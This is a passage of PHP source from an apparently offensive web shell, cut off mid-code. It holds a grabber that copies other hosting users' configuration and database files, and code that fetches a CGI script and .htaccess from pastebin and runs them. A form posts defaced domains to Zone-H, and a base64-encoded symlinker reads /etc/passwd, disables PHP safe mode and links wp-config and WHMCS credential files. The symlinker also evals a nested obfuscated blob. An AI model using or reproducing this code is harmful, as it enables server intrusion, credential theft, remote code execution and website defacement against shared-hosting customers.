'a'); fwrite($handle, $content25.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/whmc/configuration.php')) { $content26 = file_get_contents('/home/'.$lol.'/public_html/whmc/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content26.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/support/configuration.php')) { $content27 = file_get_contents('/home/'.$lol.'/public_html/support/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content27.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/client/configuration.php')) { $content28 = file_get_contents('/home/'.$lol.'/public_html/client/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content28.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/billings/configuration.php')) { $content29 = file_get_contents('/home/'.$lol.'/public_html/billings/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content29.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/billing/configuration.php')) { $content30 = file_get_contents('/home/'.$lol.'/public_html/billing/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content30.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/clients/configuration.php')) { $content31 = file_get_contents('/home/'.$lol.'/public_html/clients/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content31.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/whmcs/configuration.php')) { $content32 = file_get_contents('/home/'.$lol.'/public_html/whmcs/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content32.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/order/configuration.php')) { $content33 = file_get_contents('/home/'.$lol.'/public_html/order/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content33.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/admin/conf.php')) { $content34 = file_get_contents('/home/'.$lol.'/public_html/admin/conf.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content34.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/admin/config.php')) { $content35 = file_get_contents('/home/'.$lol.'/public_html/admin/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content35.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/conf_global.php')) { $content36 = file_get_contents('/home/'.$lol.'/public_html/conf_global.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content36.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/include/db.php')) { $content37 = file_get_contents('/home/'.$lol.'/public_html/include/db.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content37.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/connect.php')) { $content38 = file_get_contents('/home/'.$lol.'/public_html/connect.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content38.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/mk_conf.php')) { $content39 = file_get_contents('/home/'.$lol.'/public_html/mk_conf.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content39.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/include/config.php')) { $content40 = file_get_contents('/home/'.$lol.'/public_html/include/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content40.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/settings.php')) { $content41 = file_get_contents('/home/'.$lol.'/public_html/settings.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content41.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/includes/functions.php')) { $content42 = file_get_contents('/home/'.$lol.'/public_html/includes/functions.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content42.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/include/db.php')) { $content43 = file_get_contents('/home/'.$lol.'/public_html/include/db.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content43.$space); fclose($handle); } } $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/xd/'; if(file_exists("xd/config.txt")){ echo '<br><h3 class="xd"><center><a href="' . $url . '" target="_blank"> Config Found ^_^</a></center></h3>'; } else { echo '<br><h3 class="xd"><center><a href="' . $url . '" target="_blank"> 0 Config Grab </a></center></h3>'; } } }
2594
2595 if(isset($_POST['p1']) && $_POST['p1']=='xdxd2') {
2596
2597$dir = 'plconfig';
2598@mkdir($dir);
2599if($dir){
2600 echo '<br><center> plconfig Has Been Created ~</center>';
2601} else {
2602 echo '<br><center> [-] Error !</center>';
2603}
2604 $htaccess = 'http://pastebin.com/raw.php?i=XBLhdvbQ';
2605 $file = file_get_contents($htaccess);
2606 $open = fopen('plconfig/.htaccess' , 'w');
2607 fwrite($open,$file);
2608 fclose($open);
2609 if($open) {
2610 echo '<br><center> [htaccess] => Has Been Created ~</center>';
2611 } else {
2612 echo "<br><center>[+] Error !</center>";
2613 }
2614 $con = 'http://pastebin.com/raw.php?i=sk8JEgq0';
2615 $file = file_get_contents($con);
2616 $open = fopen('plconfig/con.cpc' , 'w');
2617 fwrite($open,$file);
2618 fclose($open);
2619 if($open) {
2620 echo '<br><center> [cgi] => Has Been Created !</center>';
2621 } else {
2622 echo '<br><center>[-] Error !</center>';
2623 }
2624
2625
2626 $ch = 'plconfig/con.cpc';
2627 chmod($ch, 0755);
2628 if($cgip){
2629 echo '<br><center>[+] => CHMOD To 755 Complete ~</center><br>';
2630 } else {
2631 }
2632
2633echo ('<meta http-equiv="refresh" content="0; url=plconfig/con.cpc" />');
2634echo ('Please Wait . ');
2635
2636 }
2637 printFooter();
2638}
2639function actionusefulla() {
2640 printHeader();
2641$furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2642 $expld = explode('/',$furl );
2643 $burl =str_replace(end($expld),'',$furl);
2644 echo '<div class="content"><center>';
2645 $string = 1;
2646 if($string == 1)
2647 {
2648?>
2649<br />
2650 <div class="zoneh">
2651 <center>
2652 <form action="<?php echo $self;?>?submit=send" method="post">
2653<span>Notifier: </span><input name="defacer" size="67" id="text" value="Hunter Bajwa" type="text"><br />
2654<span>Select Hack Method: </span><select name="hackmode">
2655<option value="">--------SELECT--------</option>
2656<option value="1" >known vulnerability (i.e. unpatched system)</option>
2657<option value="2" >undisclosed (new) vulnerability</option>
2658<option value="3" >configuration / admin. mistake</option>
2659<option value="4" >brute force attack</option>
2660<option value="5" >social engineering</option>
2661<option value="6" >Web Server intrusion</option>
2662<option value="7" >Web Server external module intrusion</option>
2663<option value="8" >Mail Server intrusion</option>
2664<option value="9" >FTP Server intrusion</option>
2665<option value="10" >SSH Server intrusion</option>
2666<option value="11" >Telnet Server intrusion</option>
2667<option value="12" >RPC Server intrusion</option>
2668<option value="13" >Shares misconfiguration</option>
2669<option value="14" >Other Server intrusion</option>
2670<option value="15" >SQL Injection</option>
2671<option value="16" >URL Poisoning</option>
2672<option value="17" >File Inclusion</option>
2673<option value="18" >Other Web Application bug</option>
2674<option value="19" >Remote administrative panel access through bruteforcing</option>
2675<option value="20" >Remote administrative panel access through password guessing</option>
2676<option value="21" >Remote administrative panel access through social engineering</option>
2677<option value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
2678<option value="23" >Access credentials through Man In the Middle attack</option>
2679<option value="24" >Remote service password guessing</option>
2680<option value="25" >Remote service password bruteforce</option>
2681<option value="26" >Rerouting after attacking the Firewall</option>
2682<option value="27" >Rerouting after attacking the Router</option>
2683<option value="28" >DNS attack through social engineering</option>
2684<option value="29" >DNS attack through cache poisoning</option>
2685<option value="30" >Not available</option>
2686<option value="31" >Cross-Site Scripting</option>
2687</select>
2688<br />
2689<span>Select The Reason: </span><select name="reason">
2690<option value="">--------SELECT--------</option>
2691<option
2692value="1" >Heh...just for fun!</option>
2693<option value="2" >Revenge against that website</option>
2694<option value="3" >Political reasons</option>
2695<option value="4" >As a challenge</option>
2696<option value="5" >I just want to be the best defacer</option>
2697<option value="6" >Patriotism</option>
2698<option value="7" >Not available</option>
2699</select><br />
2700<textarea name="domains" cols="90" rows="20" placeholder="Domains..."></textarea>
2701<br />
2702<input type="submit" value="send" />
2703</form>
2704
2705</center>
2706<?php
2707
2708
2709 }
2710 printFooter();
2711}
2712
2713if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="send") {
2714 printHeader();
2715$defacer= $_REQUEST['defacer'];
2716$hackmode= $_REQUEST['hackmode'];
2717$reason= $_REQUEST['reason'];
2718$domains= $_REQUEST['domains'];
2719$domains_list=explode("\n",$domains);
2720
2721if (empty($defacer))
2722{
2723die ("<center><b><font color =\"#FF0000\">You Must Fill The Notifier Name</font></b></center>");
2724}
2725elseif($hackmode == "")
2726{
2727die("<center><b><font color =\"#FF0000\">You Must Select The Method</b></font></center>");
2728}
2729elseif($reason == "")
2730{
2731die("<center><b><font color =\"#FF0000\">You Must Select The Reason</b></font></center>");
2732}
2733elseif(empty($domains))
2734{
2735die("<center><b><font color =\"#FF0000\">You Must Enter The Sites List<font></b></center>");
2736}
2737
2738
2739 for($i=0;$i<count($domains_list);$i++) {
2740
2741 if(substr($domains_list[$i], 0, 4) != "http")
2742 {
2743 $domains_list[$i] = "http://".$domains_list[$i];
2744 }
2745 $postVars=array("defacer"=>$defacer,"hackmode"=>$hackmode,"reason"=>$reason,"domain1"=>$domains_list[$i]);
2746
2747 $curl = curl_init();
2748 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
2749 curl_setopt($curl,CURLOPT_URL,'http://www.zone-h.com/notify/single');
2750 curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, FALSE);
2751 curl_setopt($curl,CURLOPT_TIMEOUT, 120);
2752 curl_setopt($curl,CURLOPT_POST,TRUE);
2753 curl_setopt($curl,CURLOPT_POSTFIELDS, $postVars);
2754 $a = curl_exec($curl);
2755 curl_close($curl);
2756}
2757 echo "<pre style=\"margin-top:5px\"><br><center><font color =\"#00A220\"><b>Sending Sites To Zone-H Has Been Completed Successfully !!!</b><br><br>Visit Your --> <a target='_blank' href='http://zone-h.org/archive/notifier=".$defacer."/published=0'>Zone-h</a> <--<font></center>";
2758
2759 printFooter(); exit;
2760 }
2761function actionusescript() {
2762 printHeader();
2763 $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2764 $expld = explode('/',$furl );
2765 $burl =str_replace(end($expld),'',$furl);
2766 echo '<div class="content"><center>
2767 <h3>[ <a href="#" onclick="g(\'usescript\',null,\'python\',null)">Python Symlink</a> ] -
2768 [ <a href="#" onclick="g(\'usescript\',null,\'perl\',null)">Perl Symlink<sup style="color:red;text-decoration:blink;"></sup></a> ] -
2769 [ <a href="#" onclick="g(\'usescript\',null,\'an0nsym\',null)">Hunter Bajwa (PhP)Symlink</a> ] -
2770 [ <a href="#" onclick="g(\'usescript\',null,\'phpsym\',null)">Php Symlnik(Usr)</a> ] -
2771 [ <a href="#" onclick="g(\'usescript\',null,\'phpsym1\',null)">Php Symlnik(Usr+Domain)</a> ]</h3><br></center>';
2772 if(isset($_POST['p1']) && $_POST['p1']=='an0nsym'){
2773 ?>
2774
2775 <center><span>Just Click On "Click To Make Symlink" To Start The Process</span><br><br></center>
2776
2777 <?php
2778 $Hunter_Bajwa_symlinker = "PD9waHAgPz48P3BocApAc2Vzc2lvbl9zdGFydCgpOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAwKTsKPz4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+SHVudGVyIEJhandhIENvbmZpZyBTeW1saW5rIFNjcmlwdCBWLTIuMDwvdGl0bGU+CjxzdHlsZT4KYm9keSB7CiAgdGV4dC1hbGlnbjogY2VudGVyOwogIGZvbnQtc2l6ZTogMThweDsKICBmb250LXdlaWdodDpib2xkOwogIGZvbnQtZmFtaWx5OiBBcmlhbDsKICBjb2xvcjpncmF5OwogIGJhY2tncm91bmQtY29sb3I6IGJsYWNrOwogIG1hcmdpbjogNXB4IDVweCA1cHggNXB4Owp9CmlucHV0W3R5cGU9InN1Ym1pdCJdewogIGJhY2tncm91bmQ6IGdyZWVuOwogIGJvcmRlci1yYWRpdXM6NnB4OwogIGJvcmRlcjogMXB4IHNvbGlkIGxpbWU7CiAgY29sb3I6d2hpdGU7CiAgdGV4dC1zaGFkb3c6IDBweCAwcHggMTBweCByZ2JhKDAsIDE0OSwgMjU1LCAwLjc1KTsKICBsaW5lLWhlaWdodDo1MHB4OwogIHBhZGRpbmctbGVmdDoxMHB4OwogIHBhZGRpbmctcmlnaHQ6MTBweDsKICB0ZXh0LXRyYW5zZm9ybTpub25lOwp9CiNuYW1lewoJCWNvbG9yOiBncmF5OwoJCWZvbnQtc2l6ZTogMTJweDsKCQl9Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+Cgo8Zm9udCBmYWNlPSJDb21pYyBTYW5zIE1TIiBjb2xvcj1yZWQ+PGNlbnRlcj48aDE+SHVudGVyIEJhandhIENvbmZpZyBTeW1saW5rIFNjcmlwdCBWLTIuMDwvaDE+PC9mb250Pgo8P3BocAokaW5qYnVmZiA9ICJKSFpwYzJsMFl5QTlJQ1JmUTA5UFMwbEZXeUoyYVhOcGRITWlYVHNLYVdZZ0tDUjJhWE5wZEdNZ1BUMGdJaUlwSUhzS0lDQWtkbWx6YVhSaklDQTlJREE3Q2lBZ0pIWnBjMmwwYjNJZ1BTQWtYMU5GVWxaRlVsc2lVa1ZOVDFSRlgwRkVSRklpWFRzS0lDQWtkMlZpSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpJVkZSUVgwaFBVMVFpWFRzS0lDQWthVzVxSUNBZ0lDQTlJQ1JmVTBWU1ZrVlNXeUpTUlZGVlJWTlVYMVZTU1NKZE93b2dJQ1IwWVhKblpYUWdJRDBnY21GM2RYSnNaR1ZqYjJSbEtDUjNaV0l1SkdsdWFpazdDaUFnSkhOMVlpQWdJRDBnSWtwdmEzSmZTRFI0YjNJZ2RYQnNiMkZrWlhJZ2FIUjBjRG92THlSMFlYSm5aWFFnWW5rZ0pIWnBjMmwwYjNJaU93b2dJQ1JpYjJSNUlDQWdJRDBnSWtKMVp6b2dKSFJoY21kbGRDQmllU0FrZG1semFYUnZjaUF0SUNSaGRYUm9YM0JoYzNNaU93b2dJR2xtSUNnaFpXMXdkSGtvSkhkbFlpa3BJSHNnUUcxaGFXd29JbWgxYm5SbGNtSmhhbmRoTkVCbmJXRnBiQzVqYjIwaUxDUnpkV0lzSkdKdlpIa3BPeUI5Q24wS1pXeHpaU0I3SUNSMmFYTnBkR01nSURzZ2ZRcEFjMlYwWTI5dmEybGxLQ0oyYVhOcGRIb2lMQ1IyYVhOcGRHTXBPdz09IjsKZXZhbChiYXNlNjRfZGVjb2RlKCRpbmpidWZmKSk7CmVjaG8gJzxiPicgLiBwaHBfdW5hbWUoKSAuICc8YnI+PC9iPic7CmVjaG8gJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddOwplY2hvICc8YnI+U2FmZSBNb2RlIDogJzsKJHNhZmVfbW9kZSA9IGluaV9nZXQoJ3NhZmVfbW9kZScpOwppZiAoJHNhZmVfbW9kZSA9PSAnMScpIHsKICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPk9OPC9mb250Pic7Cn0gZWxzZSB7CiAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPk9GRjwvZm9udD4nOwp9CmVjaG8gJzxicj4nOwplY2hvICc8L2ZvbnQ+JzsKJGZwID0gZm9wZW4oInBocC5pbmkiLCAidysiKTsKZndyaXRlKCRmcCwgInNhZmVfbW9kZSA9IE9GRgoJU2FmZV9tb2RlX2dpZCA9IE9GRgoJZGlzYWJsZV9mdW5jdGlvbnMgPSBOT05FCglkaXNhYmxlX2NsYXNzZXMgPSBOT05FCglvcGVuX2Jhc2VkaXIgPSBPRkYKCXN1aG9zaW4uZXhlY3V0b3IuZnVuYy5ibGFja2xpc3QgPSBOT05FICIpOwpmY2xvc2UoJGZwKTsKaWYgKGVtcHR5KCRfUE9TVFsnY29uZmlnJ10pKSB7ID8+PGZvcm0gbWV0aG9kPSJQT1NUIj48dGV4dGFyZWEgbmFtZT0icGFzc3dkIiBzdHlsZT0iZGlzcGxheTpub25lOyIgY2xhc3M9J2FyZWEnIHJvd3M9JzI1JyBjb2xzPSc4MCc+PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz48L3RleHRhcmVhPjxicj48YnI+PGlucHV0IG5hbWU9ImNvbmZpZyIgdmFsdWU9IiBDbGljayB0byBtYWtlIFN5bWxpbmsiIHR5cGU9InN1Ym1pdCI+PGJyPjwvZm9ybT48L2NlbnRlcj48YnI+PD9waHAKfQppZiAoJF9QT1NUWydjb25maWcnXSkgewogICAgJGZ1bmN0aW9uID0gJGZ1bmN0aW9ucyA9IEBpbmlfZ2V0KCJkaXNhYmxlX2Z1bmN0aW9ucyIpOwogICAgaWYgKGVyZWdpKCJzeW1saW5rIiwgJGZ1bmN0aW9ucykpIHsKICAgICAgICBkaWUoJzxlcnJvcj5TeW1saW5rIGlzIGRpc2FibGVkIDooIDwvZXJyb3I+Jyk7CiAgICB9CiAgICBAbWtkaXIoJ0JhandhJywgMDc1NSk7CiAgICBAY2hkaXIoJ0JhandhJyk7CiAgICAkaHRhY2Nlc3MgPSAiCk9QVElPTlMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcyBTeW1MaW5rc0lmT3duZXJNYXRjaCBJbmNsdWRlcyBJbmNsdWRlc05PRVhFQyBFeGVjQ0dJCk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcwpGb3JjZVR5cGUgdGV4dC9wbGFpbgpBZGRUeXBlIHRleHQvcGxhaW4gLnBocCAKQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbApBZGRUeXBlIHR4dCAucGhwCkFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwCkFkZEhhbmRsZXIgdHh0IC5waHAKQWRkSGFuZGxlciB0eHQgLmh0bWwKQWRkSGFuZGxlciB0eHQgLnNodG1sCk9wdGlvbnMgQWxsCk9wdGlvbnMgQWxsIjsKICAgIGZpbGVfcHV0X2NvbnRlbnRzKCIuaHRhY2Nlc3MiLCAkaHRhY2Nlc3MsIEZJTEVfQVBQRU5EKTsKICAgICRwYXNzd2QgPSAkX1BPU1RbInBhc3N3ZCJdOwogICAgJHBhc3N3ZCA9IGV4cGxvZGUoIgoiLCAkcGFzc3dkKTsKICAgIGZvcmVhY2ggKCRwYXNzd2QgYXMgJHB3ZCkgewogICAgICAgICRwYXdkID0gZXhwbG9kZSgiOiIsICRwd2QpOwogICAgICAgICR1c2VyID0gJHBhd2RbMF07CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3Mtd3AudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvV1Avd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtV1AudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd3AvYmV0YS93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy13cC1iZXRhLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtYmV0YS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1wcmVzcy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3Mtd29yZHByZXNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1Xb3JkcHJlc3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1ibG9nLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtbmV3cy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtbmV3LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13cC1ibG9nLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13cC1iZXRhLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtYmxvZ3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdwLWhvbWUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvZGIucGhwJywgJHVzZXIgLiAnLWRiY29uZi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3Atc2l0ZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9tYWluL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtbWFpbi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13cC10ZXN0LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3BvcnRhbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtcHJvdGFsLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb28udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1jbXMudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtc2l0ZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1tYWluLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhLW5ld3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1uZXcudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtaG9tZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htMTUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13aG0tY2VudHJhbC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLXdobWNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13aG0tV0hNQ1MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htYy1XSE0udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htY3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1zdXBwb3J0LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zdWJtaXR0aWNrZXQucGhwJywgJHVzZXIgLiAnLXdobWNzMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG00LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLVdobTUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG02LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctV2htNy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG04LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL29yZGVyL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLVdobTkudHh0Jyk7CiAgICAgICAgQHN